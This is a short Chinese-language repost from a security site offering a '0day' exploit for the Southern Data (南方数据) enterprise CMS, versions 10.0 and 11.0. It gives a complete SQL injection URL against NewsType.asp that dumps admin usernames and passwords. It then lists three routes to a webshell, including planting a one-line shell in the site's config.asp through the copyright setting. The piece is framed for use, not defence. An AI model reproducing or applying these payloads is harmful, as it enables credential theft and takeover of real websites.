首页 网络安全 安全学院 查看内容

南方数据企业0day漏洞(影响版本: v10.0 v11.0)

2009-6-29 09:23 959 0

摘要:   影响版本: v10.0 v11.0  http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCH...
关键词: 20 后台 一句话 直接 密码 用户 select union shell http

  影响版本: v10.0 v11.0  http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='  直接爆用户密码。   拿shell方法貌似有3种  1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。  2、进后台备份数据库  3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部